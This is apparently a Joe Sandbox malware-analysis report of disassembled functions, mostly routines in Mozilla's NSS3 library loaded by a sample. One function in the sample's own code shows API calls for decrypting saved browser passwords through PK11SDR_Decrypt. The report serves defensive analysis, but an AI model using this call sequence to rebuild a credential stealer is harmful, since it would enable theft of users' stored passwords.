Part of subcall function 6CF69180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6CF9379E,?,6CF69568,00000000,?,6CF9379E,?,00000001,?), ref: 6CF691A0

Part of subcall function 6CF307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CEC204A), ref: 6CF307AD
Part of subcall function 6CF307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CEC204A), ref: 6CF307CD
Part of subcall function 6CF307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CEC204A), ref: 6CF307D6
Part of subcall function 6CF307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CEC204A), ref: 6CF307E4
Part of subcall function 6CF307A0: TlsSetValue.KERNEL32(00000000,?,6CEC204A), ref: 6CF30864
Part of subcall function 6CF307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CF30880
Part of subcall function 6CF307A0: TlsSetValue.KERNEL32(00000000,?,?,6CEC204A), ref: 6CF308CB
Part of subcall function 6CF307A0: TlsGetValue.KERNEL32(?,?,6CEC204A), ref: 6CF308D7
Part of subcall function 6CF307A0: TlsGetValue.KERNEL32(?,?,6CEC204A), ref: 6CF308FB

PR_SetError.NSS3(00000000,00000000), ref: 6CF8316D

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: 49d2d3e0f57f2c789165c99f5d70f97891991c66fb952dd1d5240a1273dd4871
Instruction ID: 364a9dde0d09ed022848382fe31e16d939758d66a31d4c9a405551d3f09f50a7
Opcode Fuzzy Hash: 49d2d3e0f57f2c789165c99f5d70f97891991c66fb952dd1d5240a1273dd4871
Instruction Fuzzy Hash: 43F19EB5D01618AFDF00DF64D888B9EBBB4BF09318F144169EC05AB721EB31E995CB91

Function 6CF86CD0 Relevance: 30.3, APIs: 20, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CF86910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CF86943
Part of subcall function 6CF86910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CF86957
Part of subcall function 6CF86910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CF86972
Part of subcall function 6CF86910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CF86983
Part of subcall function 6CF86910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CF869AA
Part of subcall function 6CF86910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CF869BE
Part of subcall function 6CF86910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CF869D2
Part of subcall function 6CF86910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CF869DF
Part of subcall function 6CF86910: NSSUTIL_ArgStrip.NSS3(?), ref: 6CF86A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CF86D8C
free.MOZGLUE(00000000), ref: 6CF86DC5
free.MOZGLUE(?), ref: 6CF86DD6
free.MOZGLUE(?), ref: 6CF86DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CF86E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CF86E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CF86E72
free.MOZGLUE(?), ref: 6CF86EA7
free.MOZGLUE(?), ref: 6CF86EC4
free.MOZGLUE(?), ref: 6CF86ED5
free.MOZGLUE(00000000), ref: 6CF86EE3
free.MOZGLUE(?), ref: 6CF86EF4
free.MOZGLUE(?), ref: 6CF86F08
free.MOZGLUE(00000000), ref: 6CF86F35
free.MOZGLUE(?), ref: 6CF86F44
free.MOZGLUE(?), ref: 6CF86F5B
free.MOZGLUE(00000000), ref: 6CF86F65

Part of subcall function 6CF86C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CF8781D,00000000,6CF7BE2C,?,6CF86B1D,?,?,?,?,00000000,00000000,6CF8781D), ref: 6CF86C40
Part of subcall function 6CF86C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CF8781D,?,6CF7BE2C,?), ref: 6CF86C58
Part of subcall function 6CF86C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CF8781D), ref: 6CF86C6F
Part of subcall function 6CF86C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CF86C84
Part of subcall function 6CF86C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CF86C96
Part of subcall function 6CF86C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CF86CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CF86F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CF86FC5
PK11_GetInternalKeySlot.NSS3 ref: 6CF86FF4

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID:
API String ID: 1304971872-0
Opcode ID: 8e7ff56ff81e9450b3bf6eed01cc2a0c262a6ad7c478f92fc2d6e4751d578f5a
Instruction ID: 95fa4298397a2d82119fa1c69135485987d94801236a5a79b6e5a27ff0b87763
Opcode Fuzzy Hash: 8e7ff56ff81e9450b3bf6eed01cc2a0c262a6ad7c478f92fc2d6e4751d578f5a
Instruction Fuzzy Hash: 3BB15CB1E122099FEF00CBA5D845BDEBBB8BF09349F140025F915E7641E731E915CBA5

Function 6CF84C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CF84C4C
EnterCriticalSection.KERNEL32(?), ref: 6CF84C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CF84CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CF84CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CF84CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CF84D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CF84D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CF84DB7

Part of subcall function 6CFEDD70: TlsGetValue.KERNEL32 ref: 6CFEDD8C
Part of subcall function 6CFEDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CFEDDB4

Part of subcall function 6CF307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CEC204A), ref: 6CF307AD
Part of subcall function 6CF307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CEC204A), ref: 6CF307CD
Part of subcall function 6CF307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CEC204A), ref: 6CF307D6
Part of subcall function 6CF307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CEC204A), ref: 6CF307E4
Part of subcall function 6CF307A0: TlsSetValue.KERNEL32(00000000,?,6CEC204A), ref: 6CF30864
Part of subcall function 6CF307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CF30880
Part of subcall function 6CF307A0: TlsSetValue.KERNEL32(00000000,?,?,6CEC204A), ref: 6CF308CB
Part of subcall function 6CF307A0: TlsGetValue.KERNEL32(?,?,6CEC204A), ref: 6CF308D7
Part of subcall function 6CF307A0: TlsGetValue.KERNEL32(?,?,6CEC204A), ref: 6CF308FB

TlsGetValue.KERNEL32 ref: 6CF84DD7
EnterCriticalSection.KERNEL32(?), ref: 6CF84DEC
PR_Unlock.NSS3(?), ref: 6CF84E1B
PR_SetError.NSS3(00000000,00000000), ref: 6CF84E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CF84E5A
PR_SetError.NSS3(00000000,00000000), ref: 6CF84E71
free.MOZGLUE(00000000), ref: 6CF84E7A
PR_Unlock.NSS3(?), ref: 6CF84EA2
TlsGetValue.KERNEL32 ref: 6CF84EC1
EnterCriticalSection.KERNEL32(?), ref: 6CF84ED6
PR_Unlock.NSS3(?), ref: 6CF84F01
free.MOZGLUE(00000000), ref: 6CF84F2A

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: 3017bcc97a0d5a0144e503ec6f8a2e9643154d4d63625bf590a81f117c2c2e21
Instruction ID: b2157c1de8cb238efc7d2f558917d88186aa1483e98788d6af75ca7ed90d8b35
Opcode Fuzzy Hash: 3017bcc97a0d5a0144e503ec6f8a2e9643154d4d63625bf590a81f117c2c2e21
Instruction Fuzzy Hash: B9B114B6D01205AFDB00DF68D854BAE7BB8BF49318F044129ED159BB41EB34E964CBE1

Function 0040CA90 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 383filestringCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(00000000), ref: 0040CAA5

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,02D252C8,00000000,?,00421544,00000000,?,?), ref: 0040CB6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CB89
GetFileSize.KERNEL32(00000000,00000000), ref: 0040CB95
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CBA8
??_U@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CBB5
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CBD9
StrStrA.SHLWAPI(?,02D25358,00420B56), ref: 0040CBF7
StrStrA.SHLWAPI(00000000,02D25310), ref: 0040CC1E
StrStrA.SHLWAPI(?,02D26018,00000000,?,00421550,00000000,?,00000000,00000000,?,02D1DF08,00000000,?,0042154C,00000000,?), ref: 0040CDA2
StrStrA.SHLWAPI(00000000,02D260B8), ref: 0040CDB9

Part of subcall function 0040C920: memset.MSVCRT ref: 0040C953
Part of subcall function 0040C920: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02D1DFB8), ref: 0040C971
Part of subcall function 0040C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C97C
Part of subcall function 0040C920: PK11_GetInternalKeySlot.NSS3 ref: 0040C98A
Part of subcall function 0040C920: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C9A5
Part of subcall function 0040C920: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C9EB
Part of subcall function 0040C920: memcpy.MSVCRT(?,?,?), ref: 0040CA12
Part of subcall function 0040C920: PK11_FreeSlot.NSS3(?), ref: 0040CA61

StrStrA.SHLWAPI(?,02D260B8,00000000,?,00421554,00000000,?,00000000,02D1DFB8), ref: 0040CE5A
StrStrA.SHLWAPI(00000000,02D1E128), ref: 0040CE71

Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B47), ref: 0040CA43
Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B4B), ref: 0040CA57
Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B4E), ref: 0040CA78

lstrlenA.KERNEL32(00000000), ref: 0040CF44
CloseHandle.KERNEL32(00000000), ref: 0040CF9C
NSS_Shutdown.NSS3 ref: 0040CFAA

Strings

, xrefs: 0040CAC6

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeStringmemcpymemset
String ID:
API String ID: 3555573487-3916222277
Opcode ID: 5f13a7f6345ea503866bf31024cb563e3b3ffb66fff8b26f0b06ddbc043e037e
Instruction ID: 4fdc336044367871c69213567fe42fce90f61d04e08d5fff212e48b059342ccf
Opcode Fuzzy Hash: 5f13a7f6345ea503866bf31024cb563e3b3ffb66fff8b26f0b06ddbc043e037e
Instruction Fuzzy Hash: 2AE13E71D05108ABCB14EBA1DCA6FEEB779AF14304F00419EF10663191EF387A99CB69

Function 6CF55DB0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 238memoryCOMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CF55DEC
PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6CF55E0F
PORT_ZAlloc_Util.NSS3(00000828), ref: 6CF55E35
SECKEY_CopyPublicKey.NSS3(?), ref: 6CF55E6A
HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6CF55EC3
NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6CF55ED9
SECKEY_SignatureLen.NSS3(?), ref: 6CF55F09
PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6CF55F49
SECKEY_DestroyPublicKey.NSS3(?), ref: 6CF55F89
free.MOZGLUE(?), ref: 6CF55FA0
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CF55FB6
free.MOZGLUE(00000000), ref: 6CF55FBF
memcpy.VCRUNTIME140(?,?,00000000), ref: 6CF5600C
memcpy.VCRUNTIME140(?,?,00000000), ref: 6CF56079
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CF56084
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CF56094

Strings

, xrefs: 6CF55EEB

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
String ID:
API String ID: 2310191401-3916222277
Opcode ID: 6db54a7b0f7ea0fae4ec00a0b4b6e9760f80207f245b91b90f5e32d8fcb8b4d0
Instruction ID: c86bb34e8b845b9822dfafa3ed236087648362b8ac9ecefb8afc47073f44e25f
Opcode Fuzzy Hash: 6db54a7b0f7ea0fae4ec00a0b4b6e9760f80207f245b91b90f5e32d8fcb8b4d0
Instruction Fuzzy Hash: DD81F5B2E042059BEF008B64DC80BAF77F5AF54318F544128EA1AE7791E732E924CBD1

Function 6CF76D60 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6CF76D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CF76DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CF76DC3

Part of subcall function 6D05D930: PL_strncpyz.NSS3(?,?,?), ref: 6D05D963

PR_LogPrint.NSS3(?,00000000), ref: 6CF76DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CF76DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CF76E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6CF76E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6CF76E47
PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6CF76EB9

Strings

C_Digest, xrefs: 6CF76D81
pulDigestLen = 0x%p, xrefs: 6CF76E42
pDigest = 0x%p, xrefs: 6CF76E27
(CK_INVALID_HANDLE), xrefs: 6CF76DBC
ulDataLen = %d, xrefs: 6CF76E0E
hSession = 0x%x, xrefs: 6CF76D9E, 6CF76DAE
*pulDigestLen = 0x%x, xrefs: 6CF76EB4
pData = 0x%p, xrefs: 6CF76DF5

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest
API String ID: 1003633598-2270781106
Opcode ID: c1438e776e86c00554fb519a8828f90398d2bda807b63018133ae2b1a8d26ad6
Instruction ID: e3aa19ac3438ed72672b101cf9c7c86a7ca390ba39a9af515b3bbea4ca7dfadb
Opcode Fuzzy Hash: c1438e776e86c00554fb519a8828f90398d2bda807b63018133ae2b1a8d26ad6
Instruction Fuzzy Hash: 3D41A176505114AFEB209B65EE54F9E3BB1EB9231CF494026F908AB213DB30D854CBB2

Function 6CF79C40 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 118COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_LoginUser), ref: 6CF79C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CF79C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CF79CA3

Part of subcall function 6D05D930: PL_strncpyz.NSS3(?,?,?), ref: 6D05D963

PR_LogPrint.NSS3(?,00000000), ref: 6CF79CB9
PR_LogPrint.NSS3( userType = 0x%x,?), ref: 6CF79CDA
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CF79CF5
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CF79D10
PR_LogPrint.NSS3( pUsername = 0x%p,?), ref: 6CF79D29
PR_LogPrint.NSS3( ulUsernameLen = %d,?), ref: 6CF79D42

Strings

C_LoginUser, xrefs: 6CF79C61
pPin = 0x%p, xrefs: 6CF79CF0
(CK_INVALID_HANDLE), xrefs: 6CF79C9C
hSession = 0x%x, xrefs: 6CF79C7E, 6CF79C8E
ulUsernameLen = %d, xrefs: 6CF79D3D
userType = 0x%x, xrefs: 6CF79CD5
ulPinLen = %d, xrefs: 6CF79D0B
pUsername = 0x%p, xrefs: 6CF79D24

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ pUsername = 0x%p$ ulPinLen = %d$ ulUsernameLen = %d$ userType = 0x%x$ (CK_INVALID_HANDLE)$C_LoginUser
API String ID: 1003633598-3838449515
Opcode ID: 387587e369f017cf2af2dd25d737bd76db2f97ec408a2cbde0865f3a288ea3b7
Instruction ID: 7d8cc3a6fa97f08772e1bb86fba7df1906666b02909f0f97fd1ac2c7f52572d2
Opcode Fuzzy Hash: 387587e369f017cf2af2dd25d737bd76db2f97ec408a2cbde0865f3a288ea3b7
Instruction Fuzzy Hash: E141C172505104ABEB20DF61EE44F5E3BB5EB5330DF494026FE086B253DB309A14CBA1

Function 6D059C60 Relevance: 27.2, APIs: 18, Instructions: 202threadCOMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000080), ref: 6D059C70
PR_NewLock.NSS3 ref: 6D059C85

Part of subcall function 6D0098D0: calloc.MOZGLUE(00000001,00000084,6CF30936,00000001,?,6CF3102C), ref: 6D0098E5

PR_NewCondVar.NSS3(00000000), ref: 6D059C96

Part of subcall function 6CF2BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6CF321BC), ref: 6CF2BB8C

PR_NewLock.NSS3 ref: 6D059CA9

Part of subcall function 6D0098D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6D009946
Part of subcall function 6D0098D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CEC16B7,00000000), ref: 6D00994E
Part of subcall function 6D0098D0: free.MOZGLUE(00000000), ref: 6D00995E

PR_NewLock.NSS3 ref: 6D059CB9
PR_NewLock.NSS3 ref: 6D059CC9
PR_NewCondVar.NSS3(00000000), ref: 6D059CDA

Part of subcall function 6CF2BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6CF2BBEB
Part of subcall function 6CF2BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6CF2BBFB
Part of subcall function 6CF2BB80: GetLastError.KERNEL32 ref: 6CF2BC03
Part of subcall function 6CF2BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6CF2BC19
Part of subcall function 6CF2BB80: free.MOZGLUE(00000000), ref: 6CF2BC22

PR_NewCondVar.NSS3(?), ref: 6D059CF0
PR_NewPollableEvent.NSS3 ref: 6D059D03

Part of subcall function 6D04F3B0: PR_CallOnce.NSS3(6D0A14B0,6D04F510), ref: 6D04F3E6
Part of subcall function 6D04F3B0: PR_CreateIOLayerStub.NSS3(6D0A006C), ref: 6D04F402
Part of subcall function 6D04F3B0: PR_Malloc.NSS3(00000004), ref: 6D04F416
Part of subcall function 6D04F3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6D04F42D
Part of subcall function 6D04F3B0: PR_SetSocketOption.NSS3(?), ref: 6D04F455
Part of subcall function 6D04F3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6D04F473

Part of subcall function 6D009890: TlsGetValue.KERNEL32(?,?,?,6D0097EB), ref: 6D00989E

EnterCriticalSection.KERNEL32(?), ref: 6D059D78
calloc.MOZGLUE(00000001,0000000C), ref: 6D059DAF
_PR_CreateThread.NSS3(00000000,6D059EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6D059D9F

Part of subcall function 6CF2B3C0: TlsGetValue.KERNEL32 ref: 6CF2B403
Part of subcall function 6CF2B3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6CF2B459

_PR_CreateThread.NSS3(00000000,6D05A060,00000000,00000001,00000001,00000000,?,00000000), ref: 6D059DE8
calloc.MOZGLUE(00000001,0000000C), ref: 6D059DFC
_PR_CreateThread.NSS3(00000000,6D05A530,00000000,00000001,00000001,00000000,?,00000000), ref: 6D059E29
calloc.MOZGLUE(00000001,0000000C), ref: 6D059E3D
_PR_MD_UNLOCK.NSS3(?), ref: 6D059E71
PR_SetError.NSS3(FFFFE890,00000000), ref: 6D059E89

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
